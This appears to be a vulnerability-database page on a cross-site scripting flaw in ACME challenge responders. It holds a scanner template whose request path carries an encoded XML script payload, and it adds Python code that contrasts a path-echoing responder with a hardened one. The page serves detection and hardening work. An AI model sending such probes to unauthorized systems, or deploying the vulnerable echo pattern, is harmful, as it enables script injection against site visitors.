acme-xss: Let's Encrypt - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Let's Encrypt | PoC: Published

Vulnerability Description

Let's Encrypt contains a cross-site scripting vulnerability when using the ACME protocol to issue SSL certificates.

PoC Code [Published]

id: acme-xss

info:
  name: Let's Encrypt - Cross-Site Scripting
  author: pdteam
  severity: high
  description: Let's Encrypt contains a cross-site scripting vulnerability when using the the ACME protocol to issue SSL certificates.
  reference:
    - https://www.mike-gualtieri.com/posts/chaining-remote-web-vulnerabilities-to-abuse-lets-encrypt
    - https://community.letsencrypt.org/t/xss-via-acme-implementations/72295
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,acme,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<?xml version=\"1.0\"?><x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>"

      - type: word
        words:
          - "/xml"
          - "/html"
# digest: 4a0a00473045022071eb7eec456ec61a04ea7ca1ef58824c248ad7550175d12774a2d7935b69814502210098743917b592bdb223278e9fe5d72392e560d3d135b2008cb2d2dcfa39295ad5:922c64590222798bb761d5b6d8e72950
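
An added defensive example, not part of the template or of any ACME client's code: the template above requests a markup string where an http-01 challenge token belongs and looks for it in the response, so this code contrasts a responder that echoes the path with one that reflects only base64url tokens (RFC 8555, section 8.3) as `text/plain` with `nosniff`. The function names, the token length bounds, and the sample token and thumbprint are assumptions made for the example.

```python
import re
from urllib.parse import unquote

PREFIX = "/.well-known/acme-challenge/"
# RFC 8555 section 8.3: a token uses only the base64url alphabet.
# The length bounds are an assumption of this example.
TOKEN_RE = re.compile(r"[A-Za-z0-9_-]{22,128}")

# Constructed sample values, not real ACME data.
THUMBPRINT = "CONSTRUCTED_ACCOUNT_THUMBPRINT"
GOOD_TOKEN = "constructed-token_0123456789abcdefABCDEF"
# Request path copied from the template on this page ({{BaseURL}} removed).
PAGE_PROBE_PATH = PREFIX + (
    "%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x="
    "%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain"
    "%26%23x29%3B%3C/x:script%3E"
)


def naive_response(path, thumbprint=THUMBPRINT):
    """Before: echo whatever follows the prefix, with no Content-Type."""
    token = unquote(path[len(PREFIX):])
    return 200, {}, f"{token}.{thumbprint}"


def hardened_response(path, thumbprint=THUMBPRINT):
    """After: reflect only well-formed tokens, always as inert plain text."""
    headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    token = unquote(path[len(PREFIX):]) if path.startswith(PREFIX) else ""
    if not TOKEN_RE.fullmatch(token):
        return 404, headers, "not found"  # fixed body, nothing reflected
    return 200, headers, f"{token}.{thumbprint}"


if __name__ == "__main__":
    for name, fn in (("naive", naive_response), ("hardened", hardened_response)):
        status, headers, body = fn(PAGE_PROBE_PATH)
        print(name, status, headers.get("Content-Type"), "<" in body)
```

A server that keeps state can go further and answer only for tokens it has an outstanding order for, which removes the stateless echo entirely.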
